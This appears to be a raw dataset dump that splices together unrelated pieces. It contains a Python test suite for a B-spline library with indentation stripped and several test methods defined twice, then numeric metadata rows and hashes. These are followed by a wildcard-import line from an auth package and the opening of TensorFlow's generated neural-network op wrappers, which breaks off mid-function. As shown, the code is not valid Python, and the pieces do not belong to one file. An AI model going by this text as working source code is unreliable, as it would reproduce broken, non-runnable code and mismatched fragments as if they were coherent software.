d1 = numpy.array(M1.shape)
d2 = numpy.array(M2.shape)
self.assertEqual(d1.size,d2.size)
for i in range(0,d1.size):
self.assertEqual(M1.shape[i], M2.shape[i])
md = numpy.max(numpy.abs(M1 - M2))
self.assertTrue(md < tolerance, msg= "The matrices\n%s\nand\n%s\nwere not equal to within tolerance %e [%e > %e]: %s" % (M1,M2,tolerance,md,tolerance, msg))
class TestBSplines(BSplineTestCase):
def test_bounds(self):
numpy.random.seed(3)
for order in range(2,10):
A = createUniformKnotBSpline(order,3,1);
aspl = A[0]
# Now, test that the bounds checking works.
# These shouldn't raise an exception.
aspl.eval(aspl.t_min())
aspl.eval(aspl.t_max())
# These boundary cases should.
self.assertRaises(RuntimeError, lambda: aspl.eval(aspl.t_min() - 1e-15))
self.assertRaises(RuntimeError, lambda: aspl.eval(aspl.t_max() + 1e-15))
aspl.eval(aspl.t_max() - 1e-15)
def test_init(self):
numpy.random.seed(5)
# Test the initialization from two times and two positions.
p_0 = numpy.array([1,2,3]);
p_1 = numpy.array([2,4,6]);
t_0 = 0.0
t_1 = 0.1
dt = t_1 - t_0
v = (p_1 - p_0)/dt
for order in range(2,10):
aspl = bsplines.BSpline(order)
#print "order: %d" % order
#print "p_0: %s" % p_0
#print "p_1: %s" % p_1
# Initialize the spline with these two times
aspl.initSpline(t_0,t_1,p_0,p_1);
b_0 = aspl.eval(t_0)
b_1 = aspl.eval(t_1)
v_0 = aspl.evalD(t_0,1)
v_1 = aspl.evalD(t_1,1)
#print "b_0: %s" % b_0
#print "b_1: %s" % b_1
for j in range(0,p_0.size):
# Keep the threshold low for even power cases.
self.assertAlmostEqual(p_0[j],b_0[j],places=2)
self.assertAlmostEqual(p_1[j],b_1[j],places=2)
self.assertAlmostEqual(v_0[j],v[j],places=2)
self.assertAlmostEqual(v_1[j],v[j],places=2)
def test_time_interval(self):
numpy.random.seed(6)
# Test two functions:
for order in range(2,10):
A = createUniformKnotBSpline(order,3,3)
aspl = A[0]
# Check that the time interval function works.
ti = aspl.timeInterval()
self.assertEqual(ti[0], aspl.t_min())
self.assertEqual(ti[1], aspl.t_max())
# Check that the individual segment time interval function works
for i in range(0,3):
ti = aspl.timeInterval(i)
self.assertEqual(ti[0], order - 1 + i)
self.assertEqual(ti[1], order + i)
def test_new_segment(self):
numpy.random.seed(7)
# This function tests adding a new segment to the curve.
for order in range(2,10):
# Create a spline with two segments
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(order + 1)
kc = aspl.numCoefficientsRequired(order + 1);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr - 1, kr)
cp = numpy.random.random(kc);
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
# Store a reference spline that doesn't get modified.
aspl_ref = bsplines.BSpline(order)
aspl_ref.setKnotVectorAndCoefficients(knots,cpa)
# Now add a segment to the spline.
ti = aspl.timeInterval()
# the current set of knots is uniformly spaced with spacing 1.0
# Let's muck around with that.
t_k = ti[1] + 0.5
p_k = numpy.array([1.0,2.0,3.0]);
aspl.addCurveSegment(t_k,p_k);
# This function doesn't necessarily preserve the existing curve. It
# does, however, preserve the curve at ti[0] (all derivatives) and
# interpolate the value at ti[1]. Verify this.
# For all derivatives at ti[0]
for d in range(0,order):
# Evaluate the new curve and the reference curve
ref_p = aspl_ref.evalD(ti[0],d)
p = aspl.evalD(ti[0],d)
#print "[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,t,d,ref_p,p)
# Check that they are almost equal
for i in range(0,p.size):
self.assertAlmostEqual(p[i],ref_p[i], msg="[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,ti[0],d,ref_p,p))
# Now check that it interpolates the position at ti[1]
# Evaluate the new curve and the reference curve
ref_p = aspl_ref.evalD(ti[1],0)
p = aspl.evalD(ti[1],0)
# Check that they are almost equal
for i in range(0,p.size):
self.assertAlmostEqual(p[i],ref_p[i], msg="[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,ti[1],d,ref_p,p))
# Now check that the curve interpolates p_k at t_k
curve_p_k = aspl.evalD(t_k,0)
for i in range(0,p.size):
self.assertAlmostEqual(p_k[i],curve_p_k[i], msg="[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,t_k,d,ref_p,p))
def test_remove_segment(self):
numpy.random.seed(8)
for order in range(2,10):
# Create a spline with two segments
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(order + 1)
kc = aspl.numCoefficientsRequired(order + 1);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr - 1, kr)
cp = numpy.random.random(kc);
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
# Store a reference spline that doesn't get modified.
aspl_ref = bsplines.BSpline(order)
aspl_ref.setKnotVectorAndCoefficients(knots,cpa)
# Now remove a curve segment
aspl.removeCurveSegment()
# Check that the knot sequence is good.
ref_knots = aspl_ref.knots()
knots = aspl.knots()
self.assertEqual(knots.size,ref_knots.size - 1)
for i in range(0,knots.size):
self.assertEqual(knots[i],ref_knots[i+1])
# Check that the time range is still good.
self.assertEqual(aspl.t_min(),aspl_ref.timeInterval(0)[1])
# Check that the coefficients survived.
ref_coeff = aspl_ref.coefficients()
coeff = aspl.coefficients()
self.assertEqual(coeff.shape[1], ref_coeff.shape[1] - 1)
for r in range(0,coeff.shape[0]):
for c in range(0,coeff.shape[1]):
self.assertEqual(coeff[r,c], ref_coeff[r,c+1], msg="Order %s, coeff[%d,%d] %f != %f\n%s\n%s" % (order, r,c,coeff[r,c], ref_coeff[r,c+1],coeff,ref_coeff))
# Now we check that the curve still evaluates well.
for t in numpy.linspace(aspl.t_min(),aspl.t_max(),0.01):
for d in range(0,order):
# Exactly equal...not approximately equal.
self.assertEqual(aspl.evalD(t,d),aspl_ref.evalD(t,d))
def test_uniform(self):
numpy.random.seed(1)
for order in range(2,10):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(3)
kc = aspl.numCoefficientsRequired(3);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr*1.0, kr)
cp = numpy.random.random([kc])
cpa = numpy.array([cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
fspl = (knots,cp,order-1)
for i in numpy.linspace(aspl.t_min(),aspl.t_max()-1e-15,10):
f = fp.spalde(float(i),fspl)
a = aspl.eval(i)
for j in range(0,f.shape[0]):
a = aspl.evalD(i,j)
self.assertAlmostEqual(a, f[j])
def test_repeated(self):
numpy.random.seed(2)
for order in range(2,10):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(3)
kc = aspl.numCoefficientsRequired(3);
# Make a knot sequence that is all zeros at one end and all ones at the other.
knots = numpy.zeros(kr)
for i in range(0,knots.size):
if i >= knots.size * 0.5:
knots[i] = 1.0
cp = numpy.random.random([kc])
cpa = numpy.array([cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
fspl = (knots,cp,order-1)
for i in numpy.linspace(aspl.t_min(),aspl.t_max()-1e-15,10):
f = fp.spalde(float(i),fspl)
a = aspl.eval(i)
for j in range(0,f.shape[0]):
a = aspl.evalD(i,j)
self.assertAlmostEqual(a, f[j])
def test_random(self):
numpy.random.seed(3)
for order in range(2,10):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(3)
kc = aspl.numCoefficientsRequired(3);
knots = numpy.random.random([kr]) * 10
knots.sort()
cp = numpy.random.random([kc])
cpa = numpy.array([cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
fspl = (knots,cp,order-1)
for i in numpy.linspace(aspl.t_min(),aspl.t_max(),10):
f = fp.spalde(float(i),fspl)
a = aspl.eval(i)
for j in range(0,f.shape[0]):
a = aspl.evalD(i,j)
self.assertAlmostEqual(a, f[j])
def test_phi_c(self):
numpy.random.seed(4)
# Test that the linear algebra of Phi(t) * c is equivalent to the evaluation
# of the spline curve at t: b(t)
for order in range(2,10):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(3)
kc = aspl.numCoefficientsRequired(3);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr*1.0, kr)
cp = numpy.linspace(1.0,kc,kc)
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
for t in numpy.linspace(aspl.t_min(),aspl.t_max(),10):
for i in range(0,order):
# Check that Phi(t) c(t) = s(t)
s = aspl.evalD(t,i)
Phi = aspl.Phi(t,i)
c = aspl.localCoefficientVector(t)
sprime = numpy.dot(Phi,c)
for j in range(0,sprime.size):
self.assertAlmostEqual(s[j],sprime[j])
def test_U_B_c(self):
numpy.random.seed(4)
# Test that the linear algebra of Phi(t) * c is equivalent to the evaluation
# of the spline curve at t: b(t)
for order in range(2,10):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(3)
kc = aspl.numCoefficientsRequired(3);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr*1.0, kr)
cp = numpy.linspace(1.0,kc,kc)
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
for t in numpy.linspace(aspl.t_min(),aspl.t_max(),10):
for i in range(0,order):
# Check that Phi(t) c(t) = s(t)
s = aspl.evalD(t,i)
U = aspl.U(t,i)
M = aspl.Mi(aspl.segmentIndex(t))
c = aspl.localCoefficientVector(t)
sprime = numpy.dot(U.T,numpy.dot(M,c))
for j in range(0,sprime.size):
self.assertAlmostEqual(s[j],sprime[j])
def test_U_D_B_c(self):
numpy.random.seed(4)
# Test that the linear algebra of Phi(t) * c is equivalent to the evaluation
# of the spline curve at t: b(t)
for order in range(2,10):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(3)
kc = aspl.numCoefficientsRequired(3);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr*1.0, kr)
cp = numpy.linspace(1.0,kc,kc)
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
for t in numpy.linspace(aspl.t_min(),aspl.t_max(),10):
for i in range(0,order):
# Check that Phi(t) c(t) = s(t)
s = aspl.evalD(t,i)
U = aspl.U(t,0)
M = aspl.Mi(aspl.segmentIndex(t))
D = aspl.Di(aspl.segmentIndex(t))
# Evaluate the derivative as matrix multiplication
for d in range(0,i):
M = numpy.dot(D,M)
c = aspl.localCoefficientVector(t)
sprime = numpy.dot(U.T,numpy.dot(M,c))
for j in range(0,sprime.size):
self.assertAlmostEqual(s[j],sprime[j])
def test_init(self):
numpy.random.seed(5)
# Test the initialization from two times and two positions.
p_0 = numpy.array([1,2,3]);
p_1 = numpy.array([2,4,6]);
t_0 = 0.0
t_1 = 0.1
dt = t_1 - t_0
v = (p_1 - p_0)/dt
for order in range(2,10):
aspl = bsplines.BSpline(order)
#print "order: %d" % order
#print "p_0: %s" % p_0
#print "p_1: %s" % p_1
# Initialize the spline with these two times
aspl.initSpline(t_0,t_1,p_0,p_1);
b_0 = aspl.eval(t_0)
b_1 = aspl.eval(t_1)
v_0 = aspl.evalD(t_0,1)
v_1 = aspl.evalD(t_1,1)
#print "b_0: %s" % b_0
#print "b_1: %s" % b_1
for j in range(0,p_0.size):
# Keep the threshold low for even power cases.
self.assertAlmostEqual(p_0[j],b_0[j],places=2)
self.assertAlmostEqual(p_1[j],b_1[j],places=2)
self.assertAlmostEqual(v_0[j],v[j],places=2)
self.assertAlmostEqual(v_1[j],v[j],places=2)
def test_time_interval(self):
numpy.random.seed(6)
# Test two functions:
for order in range(2,10):
nSegments = 3
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(nSegments)
kc = aspl.numCoefficientsRequired(nSegments);
# Choose a uniform knot sequence at 0.0, 1.0, ...
knots = numpy.linspace(0.0,kr-1, kr)
cp = numpy.linspace(1.0,kc,kc)
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
# Check that the time interval function works.
ti = aspl.timeInterval()
self.assertEqual(ti[0], aspl.t_min())
self.assertEqual(ti[1], aspl.t_max())
# Check that the individual segment time interval function works
for i in range(0,3):
ti = aspl.timeInterval(i)
self.assertEqual(ti[0], order - 1 + i)
self.assertEqual(ti[1], order + i)
def test_new_segment(self):
numpy.random.seed(7)
# This function tests adding a new segment to the curve.
for order in range(2,10):
# Create a spline with two segments
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(order + 1)
kc = aspl.numCoefficientsRequired(order + 1);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr - 1, kr)
cp = numpy.random.random(kc);
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
# Store a reference spline that doesn't get modified.
aspl_ref = bsplines.BSpline(order)
aspl_ref.setKnotVectorAndCoefficients(knots,cpa)
# Now add a segment to the spline.
ti = aspl.timeInterval()
# the current set of knots is uniformly spaced with spacing 1.0
# Let's muck around with that.
t_k = ti[1] + 0.5
p_k = numpy.array([1.0,2.0,3.0]);
aspl.addCurveSegment(t_k,p_k);
# This function doesn't necessarily preserve the existing curve. It
# does, however, preserve the curve at ti[0] (all derivatives) and
# interpolate the value at ti[1]. Verify this.
# For all derivatives at ti[0]
for d in range(0,order):
# Evaluate the new curve and the reference curve
ref_p = aspl_ref.evalD(ti[0],d)
p = aspl.evalD(ti[0],d)
#print "[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,t,d,ref_p,p)
# Check that they are almost equal
for i in range(0,p.size):
self.assertAlmostEqual(p[i],ref_p[i], msg="[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,ti[0],d,ref_p,p))
# Now check that it interpolates the position at ti[1]
# Evaluate the new curve and the reference curve
ref_p = aspl_ref.evalD(ti[1],0)
p = aspl.evalD(ti[1],0)
# Check that they are almost equal
for i in range(0,p.size):
self.assertAlmostEqual(p[i],ref_p[i], msg="[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,ti[1],d,ref_p,p))
# Now check that the curve interpolates p_k at t_k
curve_p_k = aspl.evalD(t_k,0)
for i in range(0,p.size):
self.assertAlmostEqual(p_k[i],curve_p_k[i], msg="[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,t_k,d,ref_p,p))
def test_remove_segment(self):
numpy.random.seed(8)
for order in range(2,10):
# Create a spline with two segments
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(order + 1)
kc = aspl.numCoefficientsRequired(order + 1);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr - 1, kr)
cp = numpy.random.random(kc);
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
# Store a reference spline that doesn't get modified.
aspl_ref = bsplines.BSpline(order)
aspl_ref.setKnotVectorAndCoefficients(knots,cpa)
# Now remove a curve segment
aspl.removeCurveSegment()
# Check that the knot sequence is good.
ref_knots = aspl_ref.knots()
knots = aspl.knots()
self.assertEqual(knots.size,ref_knots.size - 1)
for i in range(0,knots.size):
self.assertEqual(knots[i],ref_knots[i+1])
# Check that the time range is still good.
self.assertEqual(aspl.t_min(),aspl_ref.timeInterval(0)[1])
# Check that the coefficients survived.
ref_coeff = aspl_ref.coefficients()
coeff = aspl.coefficients()
self.assertEqual(coeff.shape[1], ref_coeff.shape[1] - 1)
for r in range(0,coeff.shape[0]):
for c in range(0,coeff.shape[1]):
self.assertEqual(coeff[r,c], ref_coeff[r,c+1], msg="Order %s, coeff[%d,%d] %f != %f\n%s\n%s" % (order, r,c,coeff[r,c], ref_coeff[r,c+1],coeff,ref_coeff))
# Now we check that the curve still evaluates well.
for t in numpy.linspace(aspl.t_min(),aspl.t_max(),0.01):
for d in range(0,order):
# Exactly equal...not approximately equal.
self.assertEqual(aspl.evalD(t,d),aspl_ref.evalD(t,d))
def test_integral(self):
for order in range(2,8,2):
for dt in numpy.arange(0.1,2.0,0.1):
# Create a spline with three segments
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(4)
kc = aspl.numCoefficientsRequired(4);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0, (kr - 1)*dt, kr)
cp = numpy.random.random(kc);
cpa = numpy.array([cp])
aspl = bsplines.BSpline(order);
aspl.setKnotVectorAndCoefficients(knots,cpa);
fspl = (knots,cp,order-1)
for a in numpy.arange(aspl.t_min(),aspl.t_max()-1e-15,0.4*dt):
for i in numpy.arange(aspl.t_min(), aspl.t_max()-1e-15, 0.4*dt):
print("Eval at %f\n" % (i))
f = fp.splint(a,float(i),fspl)
b = aspl.evalI(a,i)
self.assertAlmostEqual(b, f, msg="order %d spline integral evaluated on [%f,%f] (%f != %f) was not right" % (order, a,i,float(b),f))
def test_integral_non_uniform(self):
for order in range(2,8,2):
# Create a spline with three segments
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(4)
kc = aspl.numCoefficientsRequired(4);
# Choose a non-uniform knot sequence.
knots = numpy.linspace(0.0, (kr - 1), kr)
knots = knots*knots
cp = numpy.random.random(kc);
cpa = numpy.array([cp])
aspl = bsplines.BSpline(order);
aspl.setKnotVectorAndCoefficients(knots,cpa);
fspl = (knots,cp,order-1)
for a in numpy.arange(aspl.t_min(),aspl.t_max()-1e-15,0.4):
for i in numpy.arange(aspl.t_min(), aspl.t_max()-1e-15, 0.4):
print("Eval at %f\n" % (i))
f = fp.splint(a,float(i),fspl)
b = aspl.evalI(a,i)
self.assertAlmostEqual(b, f, msg="order %d spline integral evaluated on [%f,%f] (%f != %f) was not right" % (order, a,i,float(b),f))
def test_integral_non_uniform_repeated(self):
for order in range(2,8,2):
# Create a spline with three segments
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(4)
kc = aspl.numCoefficientsRequired(4);
# Choose a non-uniform knot sequence.
knots = numpy.linspace(0.0, (kr - 1), kr)
knots = knots*knots
for i in range(0,len(knots)):
if i & 1 > 0:
knots[i] = knots[i-1]
cp = numpy.random.random(kc);
cpa = numpy.array([cp])
aspl = bsplines.BSpline(order);
aspl.setKnotVectorAndCoefficients(knots,cpa);
fspl = (knots,cp,order-1)
for a in numpy.arange(aspl.t_min(),aspl.t_max()-1e-15,0.4):
for i in numpy.arange(aspl.t_min(), aspl.t_max()-1e-15, 0.4):
print("Eval at %f\n" % (i))
f = fp.splint(a,float(i),fspl)
b = aspl.evalI(a,i)
self.assertAlmostEqual(b, f, msg="order %d spline integral evaluated on [%f,%f] (%f != %f) was not right" % (order, a,i,float(b),f))
def test_quadratic_integral_diag(self):
numpy.random.seed(5)
for order in range(2,6,1):
for dim in range(1,4):
# Create a spline with three segments
#A = createUniformKnotBSpline(order,4,dim, knotSpacing = 0.5);
#A = createExponentialKnotBSpline(order,4,dim, knotSpacing = 1.0);
A = createRandomKnotBSpline(order,3,dim);
aspl = A[0]
for DO in range(0,order):
w = numpy.random.random(dim);
W = numpy.diag(w);
ef = lambda t: numpy.dot(numpy.asmatrix(aspl.Phi(t,DO)).T , numpy.dot(W, numpy.asmatrix(aspl.Phi(t,DO))))
# for each segment
for s in range(0,aspl.numValidTimeSegments()):
interval = aspl.timeInterval(s)
# si.quad can't do matrices...blerg.
E = aspl.segmentQuadraticIntegralDiag(w,s,DO)
Eest = numpy.zeros(E.shape)
for r in range(0,E.shape[0]):
for c in range(0,E.shape[1]):
efrc = lambda t: ef(t)[r,c]
A = si.quad(efrc,interval[0],interval[1])
Eest[r,c] = A[0]
#print E
#print Eest
self.assertMatricesEqual(E, Eest, 1e-8, "Error comparing E and Eest\n")
def test_quadratic_integral_full(self):
numpy.random.seed(5)
for order in range(2,6,1):
for dim in range(1,4):
# Create a spline with three segments
#A = createUniformKnotBSpline(order,4,dim, knotSpacing = 0.5);
#A = createExponentialKnotBSpline(order,4,dim, knotSpacing = 1.0);
A = createRandomKnotBSpline(order,3,dim);
aspl = A[0]
for DO in range(0,order):
W = numpy.random.random([dim,dim]);
W = numpy.dot(W.T,W) + numpy.eye(dim)
ef = lambda t: numpy.dot(numpy.asmatrix(aspl.Phi(t,DO)).T , numpy.dot(W, numpy.asmatrix(aspl.Phi(t,DO))))
# for each segment
for s in range(0,aspl.numValidTimeSegments()):
interval = aspl.timeInterval(s)
# si.quad can't do matrices...blerg.
E = aspl.segmentQuadraticIntegral(W,s,DO)
Eest = numpy.zeros(E.shape)
for r in range(0,E.shape[0]):
for c in range(0,E.shape[1]):
efrc = lambda t: ef(t)[r,c]
A = si.quad(efrc,interval[0],interval[1])
Eest[r,c] = A[0]
#print E
#print Eest
self.assertMatricesEqual(E, Eest, 1e-8, "Error comparing E and Eest\n")
def test_curve_quadratic_integral_full(self):
numpy.random.seed(6)
for order in range(2,6,1):
for dim in range(1,4):
# Create a spline with three segments
#A = createUniformKnotBSpline(order,4,dim, knotSpacing = 0.5);
#A = createExponentialKnotBSpline(order,4,dim, knotSpacing = 1.0);
A = createRandomKnotBSpline(order,3,dim)
aspl = A[0]
for DO in range(0,order):
W = numpy.random.random([dim,dim]);
W = numpy.dot(W.T,W) + numpy.eye(dim)
class CurveHelper(object):
def __init__(self,aspl):
self.aspl = aspl
def quad(self,t):
L = self.aspl.coefficientVectorLength()
XX = numpy.zeros([L,L])
S = self.aspl.localCoefficientVectorIndices(t)
XX[numpy.ix_(S,S)] = numpy.dot(numpy.asmatrix(self.aspl.Phi(t,DO)).T , numpy.dot(W, numpy.asmatrix(self.aspl.Phi(t,DO))))
return XX
ch = CurveHelper(aspl)
ef = lambda t: ch.quad(t)
# si.quad can't do matrices...blerg.
E = aspl.curveQuadraticIntegral(W,DO)
Eest = numpy.zeros(E.shape)
interval = aspl.timeInterval()
# quad has trouble with the discontinuities at the knots.
# we can pass the internal knot points as a hint that
# it shouldn't worry so much.
pts = aspl.knots()
pts = pts[pts > interval[0]]
pts = pts[pts < interval[1]]
for r in range(0,E.shape[0]):
for c in range(0,E.shape[1]):
efrc = lambda t: ef(t)[r,c]
A = si.quad(efrc,interval[0],interval[1], points=pts)
Eest[r,c] = A[0]
self.assertMatricesEqual(E, Eest, 1e-6, "Error comparing E and Eest\n")
def test_constant_init(self):
tmin = 0.0
tmax = 5.0
for order in range(2,6):
for dim in range(1,4):
for segs in range(1,4):
c = numpy.random.random([dim])
# Initialize a constant spline
aspl = bsplines.BSpline(order)
aspl.initConstantSpline(tmin,tmax,segs,c)
# Test the time boundaries
self.assertAlmostEqual(tmin,aspl.t_min())
self.assertAlmostEqual(tmax,aspl.t_max())
# Test the value.
for t in numpy.arange(aspl.t_min(),aspl.t_max(),0.1):
self.assertMatricesEqual(aspl.evalD(t,0),c,1e-15,"Error getting back the constant value")
if __name__ == '__main__':
import rostest
rostest.rosrun('splines', 'bspline', TestBSplines)
#tb = TestBSplines()
#tb.test_constant_init()
| 47.739706
| 173
| 0.524536
| 4,292
| 32,463
| 3.908201
| 0.071062
| 0.030464
| 0.021939
| 0.034339
| 0.878204
| 0.869143
| 0.863002
| 0.850066
| 0.841362
| 0.834983
| 0
| 0.028835
| 0.35582
| 32,463
| 679
| 174
| 47.810015
| 0.773288
| 0.168315
| 0
| 0.789784
| 0
| 0.011788
| 0.026844
| 0.001005
| 0
| 0
| 0
| 0
| 0.108055
| 1
| 0.058939
| false
| 0
| 0.015717
| 0
| 0.090373
| 0.005894
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
716d9adb5a268f1d9ba9f01de3c49b640a44ca34
| 164
|
py
|
Python
|
src/auth/service/__init__.py
|
MarkStefanovic/todo-api
|
fb6198511712df853e693787839533f0c9956178
|
[
"MIT"
] | null | null | null |
src/auth/service/__init__.py
|
MarkStefanovic/todo-api
|
fb6198511712df853e693787839533f0c9956178
|
[
"MIT"
] | null | null | null |
src/auth/service/__init__.py
|
MarkStefanovic/todo-api
|
fb6198511712df853e693787839533f0c9956178
|
[
"MIT"
] | null | null | null |
from src.auth.service.bcrypt_password_hash_service import *
from src.auth.service.jwt_token_service import *
from src.auth.service.sqlalchemy_user_service import *
| 41
| 59
| 0.853659
| 25
| 164
| 5.32
| 0.48
| 0.157895
| 0.24812
| 0.406015
| 0.466165
| 0.466165
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 164
| 3
| 60
| 54.666667
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
717fd5c9f172899abcca22d930255476deb270ab
| 548,048
|
py
|
Python
|
Reinforcement-Learning/Python-Model/venv/lib/python3.8/site-packages/tensorflow/python/ops/gen_nn_ops.py
|
lawrence910426/ProgrammingII_FinalProject
|
493183dc2a674310e65bffe3a5e00395e8bebb4b
|
[
"MIT"
] | null | null | null |
Reinforcement-Learning/Python-Model/venv/lib/python3.8/site-packages/tensorflow/python/ops/gen_nn_ops.py
|
lawrence910426/ProgrammingII_FinalProject
|
493183dc2a674310e65bffe3a5e00395e8bebb4b
|
[
"MIT"
] | null | null | null |
Reinforcement-Learning/Python-Model/venv/lib/python3.8/site-packages/tensorflow/python/ops/gen_nn_ops.py
|
lawrence910426/ProgrammingII_FinalProject
|
493183dc2a674310e65bffe3a5e00395e8bebb4b
|
[
"MIT"
] | null | null | null |
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: nn_ops.cc
"""
import collections
from tensorflow.python import pywrap_tfe as pywrap_tfe
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
from typing import TypeVar
def avg_pool(value, ksize, strides, padding, data_format="NHWC", name=None):
r"""Performs average pooling on the input.
Each entry in `output` is the mean of the corresponding size `ksize`
window in `value`.
Args:
value: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
4-D with shape `[batch, height, width, channels]`.
ksize: A list of `ints` that has length `>= 4`.
The size of the sliding window for each dimension of `value`.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of `value`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `value`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "AvgPool", name, value, "ksize", ksize, "strides", strides,
"padding", padding, "data_format", data_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return avg_pool_eager_fallback(
value, ksize=ksize, strides=strides, padding=padding,
data_format=data_format, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"AvgPool", value=value, ksize=ksize, strides=strides, padding=padding,
data_format=data_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("ksize", _op.get_attr("ksize"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"AvgPool", _inputs_flat, _attrs, _result)
_result, = _result
return _result
AvgPool = tf_export("raw_ops.AvgPool")(_ops.to_raw_op(avg_pool))
def avg_pool_eager_fallback(value, ksize, strides, padding, data_format, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'avg_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'avg_pool' Op, not %r." % strides)
